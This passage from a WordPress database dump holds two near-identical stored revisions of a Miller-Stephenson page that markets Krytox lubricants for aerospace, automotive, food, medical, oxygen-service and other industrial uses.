radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space</li>\r\n 	<li>Excellent frictional properties for long wear and low energy consumption</li>\r\n 	<li>Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n<a name="automotive"></a>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather on leather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n<a name="automotive2"></a>\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided state of-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh under hood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Under hood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, anti lock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n<a name="petro"></a>\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n<a name="board"></a>\r\n[ux_product_categories ids="36,38,34" number="10"]\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<a name="elec"></a>\r\n[ux_product_categories ids="46,96" number="10"]\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n</ul>\r\nMultipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:\r\n<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<a name="food"></a>\r\n\r\n[ux_product_categories ids="156,46,96" number="10"]\r\n\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<a name="med"></a>\r\n[ux_product_categories ids="96,46,38,97" number="10"]\r\n\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry</li>\r\n 	<li>H-1 food grade oils and greases available Krytox works in a variety of applications:</li>\r\n 	<li>Oxygen systems and respirators</li>\r\n 	<li>Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<a name="metal"></a>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n<a name="oxy"></a>\r\n[ux_product_categories ids="40,115,116,123" number="10"]\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Miller-Stephenson offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<a name="power"></a>\r\n[ux_product_categories ids="36,38,115,116" number="10"]\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<a name="pulp"></a>\r\n\r\n[ux_product_categories ids="40,171,96,97" number="10"]\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment up time and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<a name="text"></a>\r\n[ux_product_categories ids="46,96" number="10"]\r\n\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<a name="tire"></a>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>\r\n[ux_product_categories ids="143" number="10"]', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-29 18:28:42', '2016-09-29 18:28:42', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2188, 2, '2016-09-29 18:29:20', '2016-09-29 18:29:20', '[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#automotive">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#automotive2">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#board">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#petro">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#elec">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#food">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#med">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#metal">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#oxy">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#power">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#pulp">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#text">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#tire">Tire Mold</a>\r\n\r\n[/col]\r\n<a name="aerospace"></a>\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Krytox Lubricants Industries and Applications</strong></span>\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purpose formulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing</li>\r\n 	<li>Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space</li>\r\n 	<li>Excellent frictional properties for long wear and low energy consumption</li>\r\n 	<li>Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n<a name="automotive"></a>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather on leather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n<a name="automotive2"></a>\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided state of-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh under hood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Under hood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, anti lock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n<a name="petro"></a>\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n<a name="board"></a>\r\n[ux_product_categories ids="36,38,34" number="10"]\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<a name="elec"></a>\r\n[ux_product_categories ids="46,96" number="10"]\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n</ul>\r\nMultipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:\r\n<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<a name="food"></a>\r\n\r\n[ux_product_categories ids="156,46,96" number="10"]\r\n\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<a name="med"></a>\r\n[ux_product_categories ids="96,46,38,97" number="10"]\r\n\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry</li>\r\n 	<li>H-1 food grade oils and greases available Krytox works in a variety of applications:</li>\r\n 	<li>Oxygen systems and respirators</li>\r\n 	<li>Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<a name="metal"></a>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n<a name="oxy"></a>\r\n[ux_product_categories ids="40,115,116,123" number="10"]\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Miller-Stephenson offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<a name="power"></a>\r\n[ux_product_categories ids="36,38,115,116" number="10"]\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<a name="pulp"></a>\r\n\r\n[ux_product_categories ids="40,171,96,97" number="10"]\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment up time and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and 